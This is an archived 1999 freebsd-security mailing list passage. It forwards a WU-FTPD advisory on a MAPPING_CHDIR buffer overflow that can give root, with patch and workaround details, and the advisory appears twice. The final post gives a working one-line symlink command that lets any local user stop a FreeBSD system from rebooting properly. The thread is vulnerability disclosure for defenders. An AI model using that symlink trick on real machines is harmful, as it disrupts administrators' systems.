ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/ > > The following patches are available: > > CRITICAL-SECURITY.PATCH > > Alternate name for mapped.path.overrun.patch. > > mapped.path.overrun.patch > > Corrects a problem in the implementation of the MAPPING_CHDIR > feature which could be used to gain root privileges. All sites > should apply this patch as soon as possible. > > not.in.class.patch > > Corrects a problem where anonymous users not in any class could > gain anonymous access to the server under certain conditions. > All sites should apply this patch. > > glibc.wtmp.patch > > Corrects a problem with Linux systems where logout from wu-ftpd > was not properly recorded in the wtmp file. Sites running > wu-ftpd on Linux should apply this patch. > > rfc931.timeout.patch > > Corrects some problems with the RFC931 implementation when the > remote site does not respond. Under some conditions, wu-ftpd > would hang, failing to properly time out. Sites experiencing > unexplained hanging wu-ftpd processes should apply this patch. > > data-limit.patch > > Corrects a documentation error. Released as a patch due to the > number of questions the error caused. This patch may be safely > omitted on all sites. > > deny.not.nameserved.patch > > Corrects a problem in the implementation of '!nameserved' when > attempting to deny access to remote users whose hosts do not > have proper DNS. All sites should apply this patch. > > Special note for BeroFTPD: > > BeroFTPD users should be able to apply the mapped.path.overrun.patch to > their version of wu-ftpd. (This has been tested by the WU-FTPD > Development Group on BeroFTPD 1.3.4; it applied cleanly, with some > drift in line numbers.) The other patches are for version 2.5.0 of > wu-ftpd only and should not be applied to BeroFTPD. > >3.3 Apply work-around patch and recompile existing source. > > The feature causing this problem can be disabled at compile time in all > effected versions of the daemon: > > o Locate the following text in config.h: > > /* > * MAPPING_CHDIR > * Keep track of the path the user has chdir'd into and respond with > * that to pwd commands. This is to avoid having the absolue disk > * path returned. This helps avoid returning dirs like '.1/fred' > * when lots of disks make up the ftp area. > */ > > o If this text is not present, your version of the daemon is NOT > vulnerable. > > o Change the following line from: > > #define MAPPING_CHDIR > > to > > #undef MAPPING_CHDIR > > o Rebuild and install the new ftpd executable. > >- -- > >Gregory A Lundberg WU-FTPD Development Group >1441 Elmdale Drive lundberg@wu-ftpd.org >Kettering, OH 45409-1615 USA 1-800-809-2195 > >-----BEGIN PGP SIGNATURE----- >Version: PGP 6.5 > >iQCVAwUBN8VXQg7NCCRiiFh1AQFMDQP+PM9pWpqGo9xEcn1XdEgfmr1mcqZ2y9gY >geyRyPtv8xsLqbAMcQQ/KsDO3aP4sdT3yMA0EHZKohiAG3Sx38bGBe9geaOdbUxe >jSGzc6yDIxLwegJuWK35V7C8L9BbvFCbednvmXoToshuagcGFY8ZIP2ZyDuwz4EM >VxD1ILqHUww= >=r1tK >-----END PGP SIGNATURE----- ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 28 9:45:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 74D431530C for ; Sat, 28 Aug 1999 09:44:56 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id MAA24458 for ; Sat, 28 Aug 1999 12:44:30 -0400 (EDT) Message-Id: <4.1.19990828125707.04dcbac0@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sat, 28 Aug 1999 12:57:34 -0400 To: freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Fwd: WU-FTPD Security Update Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just in case this went missed by those not on bugtraq ---Mike >Return-Path: owner-bugtraq@SECURITYFOCUS.COM >Received: from lists.securityfocus.com (lists.securityfocus.com >[216.102.46.4]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id GAA15301 >for ; Sat, 28 Aug 1999 06:31:37 -0400 (EDT) >Received: (qmail 16602 invoked from network); 28 Aug 1999 04:18:12 -0000 >Received: from lists.securityfocus.com (216.102.46.4) > by lists.securityfocus.com with SMTP; 28 Aug 1999 04:18:12 -0000 >Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM > (LISTSERV-TCP/IP release 1.8d) with spool id 932192 for > BUGTRAQ@LISTS.SECURITYFOCUS.COM; Fri, 27 Aug 1999 21:14:40 -0700 >Approved-By: aleph1@SECURITYFOCUS.COM >Received: from securityfocus.com (216.102.46.2) by lists.securityfocus.com with > SMTP; 26 Aug 1999 17:56:16 -0000 >Received: (qmail 10732 invoked by alias); 26 Aug 1999 17:56:16 -0000 >Delivered-To: BUGTRAQ@SECURITYFOCUS.COM >Received: (qmail 10728 invoked from network); 26 Aug 1999 17:56:15 -0000 >Received: from pop02.iname.net (HELO pop02.prod) (165.251.20.34) by > securityfocus.com with SMTP; 26 Aug 1999 17:56:15 -0000 >Received: from yua (cieem35.cieem.rpi.edu [128.113.60.128]) by pop02.prod > (8.9.1/8.8.0) with SMTP id NAA15291 for ; > Thu, 26 Aug 1999 13:53:44 -0400 (EDT) >MIME-Version: 1.0 >Content-Type: text/plain; charset="Windows-1252" >Content-Transfer-Encoding: 7bit >X-Priority: 3 (Normal) >X-MSMail-Priority: Normal >X-Mailer: Mutt 0.95.6i >X-From_: owner-wuftpd-members@wu-ftpd.org Thu Aug 26 12:07:11 1999 >Importance: Normal >X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 >Message-ID: >Date: Thu, 26 Aug 1999 13:43:07 -0400 >Reply-To: WU-FTPD Development Group >Sender: Bugtraq List >From: Alex Yu >Subject: WU-FTPD Security Update >X-To: BUGTRAQ@SECURITYFOCUS.COM >To: BUGTRAQ@SECURITYFOCUS.COM >X-UIDL: 23cfe0ddeeacd4b120756724b083f31f > >-----BEGIN PGP SIGNED MESSAGE----- > > WU-FTPD Security Update > >The WU-FTPD Development Group has been informed there is a vulnerability in >some versions of wu-ftpd. > >This vulnerability may allow local & remote users to gain root privileges. > >Exploit information involving this vulnerability has been made publicly >available. > >The WU-FTPD Development Group recommends sites take the steps outlined >below as soon as possible. > >1. Description > > Due to insufficient bounds checking on directory name lengths which can > be supplied by users, it is possible to overwrite the static memory > space of the wu-ftpd daemon while it is executing under certain > configurations. By having the ability to create directories and > supplying carefully designed directory names to the wu-ftpd, users may > gain privileged access. > >2. Impact > > This vulnerability may allow local & remote users to gain root > privileges. > >3. Workarounds/Solution > > Sites may prevent the exploitation of the vulnerability in wu-ftpd by > immediately upgrading and applying available patches. > >3.1 Affected versions > > Versions known to be effected are: > > wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15 > wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17 > wu-ftpd-2.5.0 > > BeroFTPD, all present versions > > Other derivatives of wu-ftpd may be effected. See the workarrounds > (section 3.3) to determine if a derivative is vulnerable. > > Versions know to be not effected are: > > NcFTPd, all versions. > wu-ftpd-2.4.2 (final, from Academ) > All Washington University versions. > > (Please note: ALL versions of WU-FTPD prior to > wu-ftpd-2.4.2-beta-18-vr10 including all WU versions, and all > Academ 2.4.1 and 2.4.2 betas, are vulnerable to a remote user > root-leveraging attack. See CERT Advisory CA-99-03 'FTP Buffer > Overflows' at > http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html > and section 3.2) > >3.2 Upgrade to latest wu-ftpd and apply patch > > The latest version of wu-ftpd from the WU-FTPD Development Group is > 2.5.0; sites running earlier versions should upgrade to this version as > soon as possible. > > The WU-FTPD Development Group has a patch available which corrects this > vulnerabililty. The patch is available directly from the WU-FTPD > Development Group's primary distribution site, and will be propogating > to its mirrors shortly. > > Several other patches to version 2.5.0 are also available. The WU-FTPD > Development Group recommends all available patches be applied. > > Patches for version 2.5.0 are available at the primary distribution > site: > > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/ > > The following patches are available: > > CRITICAL-SECURITY.PATCH > > Alternate name for mapped.path.overrun.patch. > > mapped.path.overrun.patch > > Corrects a problem in the implementation of the MAPPING_CHDIR > feature which could be used to gain root privileges. All sites > should apply this patch as soon as possible. > > not.in.class.patch > > Corrects a problem where anonymous users not in any class could > gain anonymous access to the server under certain conditions. > All sites should apply this patch. > > glibc.wtmp.patch > > Corrects a problem with Linux systems where logout from wu-ftpd > was not properly recorded in the wtmp file. Sites running > wu-ftpd on Linux should apply this patch. > > rfc931.timeout.patch > > Corrects some problems with the RFC931 implementation when the > remote site does not respond. Under some conditions, wu-ftpd > would hang, failing to properly time out. Sites experiencing > unexplained hanging wu-ftpd processes should apply this patch. > > data-limit.patch > > Corrects a documentation error. Released as a patch due to the > number of questions the error caused. This patch may be safely > omitted on all sites. > > deny.not.nameserved.patch > > Corrects a problem in the implementation of '!nameserved' when > attempting to deny access to remote users whose hosts do not > have proper DNS. All sites should apply this patch. > > Special note for BeroFTPD: > > BeroFTPD users should be able to apply the mapped.path.overrun.patch to > their version of wu-ftpd. (This has been tested by the WU-FTPD > Development Group on BeroFTPD 1.3.4; it applied cleanly, with some > drift in line numbers.) The other patches are for version 2.5.0 of > wu-ftpd only and should not be applied to BeroFTPD. > >3.3 Apply work-around patch and recompile existing source. > > The feature causing this problem can be disabled at compile time in all > effected versions of the daemon: > > o Locate the following text in config.h: > > /* > * MAPPING_CHDIR > * Keep track of the path the user has chdir'd into and respond with > * that to pwd commands. This is to avoid having the absolue disk > * path returned. This helps avoid returning dirs like '.1/fred' > * when lots of disks make up the ftp area. > */ > > o If this text is not present, your version of the daemon is NOT > vulnerable. > > o Change the following line from: > > #define MAPPING_CHDIR > > to > > #undef MAPPING_CHDIR > > o Rebuild and install the new ftpd executable. > >- -- > >Gregory A Lundberg WU-FTPD Development Group >1441 Elmdale Drive lundberg@wu-ftpd.org >Kettering, OH 45409-1615 USA 1-800-809-2195 > >-----BEGIN PGP SIGNATURE----- >Version: PGP 6.5 > >iQCVAwUBN8VXQg7NCCRiiFh1AQFMDQP+PM9pWpqGo9xEcn1XdEgfmr1mcqZ2y9gY >geyRyPtv8xsLqbAMcQQ/KsDO3aP4sdT3yMA0EHZKohiAG3Sx38bGBe9geaOdbUxe >jSGzc6yDIxLwegJuWK35V7C8L9BbvFCbednvmXoToshuagcGFY8ZIP2ZyDuwz4EM >VxD1ILqHUww= >=r1tK >-----END PGP SIGNATURE----- ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 28 19:23:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from ime.net (ime.net [209.90.192.3]) by hub.freebsd.org (Postfix) with ESMTP id A3D0615743 for ; Sat, 28 Aug 1999 19:23:39 -0700 (PDT) (envelope-from dynamo@ime.net) Received: from ime.net (ime.net [209.90.192.3]) by ime.net (8.8.7/8.8.7) with SMTP id WAA16046; Sat, 28 Aug 1999 22:22:12 -0400 (EDT) Date: Sat, 28 Aug 1999 22:22:12 -0400 (EDT) From: To: security@freebsd.org, imp@village.org Subject: Not sure if you got it... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org to stop rebooting from working right any user can just do this... ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file this is my second try -- if you can gimmie an "ok" so i know you got this i would appreciate it. -- - dynamo@ime.net, lumpy_ - vi -c'1,%s/^[^#]/#&/' /etc/inetd.conf; kill -HUP `cat /var/run/inetd.pid` -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message